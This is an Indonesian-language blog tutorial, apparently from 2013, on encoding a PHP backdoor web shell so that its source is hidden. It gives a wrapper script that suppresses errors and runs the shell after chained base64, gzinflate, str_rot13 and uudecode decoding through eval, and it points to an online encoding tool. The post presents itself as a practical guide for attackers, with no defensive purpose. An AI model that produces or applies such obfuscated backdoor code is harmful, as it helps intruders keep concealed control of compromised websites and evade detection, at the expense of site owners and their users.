Senin, 20 Mei 2013

[Tutorial] Cara Mudah Encode Shell Backdoor

Posted by Erza Jullian 13.34, under , | No comments

Kali ini saya akan share tutorial encode shell php. Ya, shell yang diencode memiliki banyak keunggulan. Selain kita menyembunyikan source asli dari shell tersebut, kita juga memperkecil ukuran dari shell.

Sekedar info, saya mendapatkan tutorial ini dari bang x'1n73ct . Dan di juga sudah mengijinkan jika tutorial ini disebarluaskan. :)

Oke langsung saja.



Bahan :

Shell mentah

Tools Encode - klik Disini



Pertama-tama, siapkan shell yang akan di encode. Copy semua script dari atas sampai bawah. :)

Lalu buka tools encode, pastekan scriptnya di kolom atas. Pilih jalur encodenya, sebagai contoh, saya pilih jalur : bsae64 � gzinflate � str_rot13 �convert_uu � gzinflate � base64 . Lalu klik menu encode.

Lihat SS :





Lalu hasil encode nantinya akan terlihat di kolom bawah.



Setelah itu, buka text editor [saya menggunakan notepad++], lalu copy script berikut :



<?php

@ini_set('output_buffering',0); 

@ini_set('display_errors', 0);



$convert = � [shell yang diencode]  �;



@eval(base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($convert))))));



?>



Untuk [shell yang diencode], silahkan diisi dengan script hasil convert dari tools encode tadi.

Lalu tulisan yang saya beri warna biru, itu silahkan diisi sesuaid engan jalur encode yang dipilih.



Saya akan sedikit nejelaskan masing-masing fungsi script tersebut :



@ini_set('output_buffering',0); 

Perintah ini berfungsi untuk meminimalkan buffering yang ada di file



@ini_set('display_errors', 0);

Perintah ini berfungsi untuk menghilangkan error pada file







Dan setelah semua selesai, simpan dengan format .php . Contoh : shell.php

Coba test di localhost dan insya allah berhasil.

Shell JKT48 HACKER pun saya rilis setelah membaca tutorial ini.



Jika tutorial saya masih kurang, sobat bisa membaca tutorial dari bang x'1n73ct . Filenya berbentuk doc [dokumen].

Klik Disini Untuk Download



Di dalam file tersebut sudah ada tutorial encode shell dan juga tools encode yang bisa dijalankan di localhost.



Sekian tutorial dari saya. Semoga bermanfaat.

Special thanks to x'1n73ct



Yang mau copas harap kasih sumber ya. :)

0 komentar:

Posting Komentar

Blog Archive

Blog Archive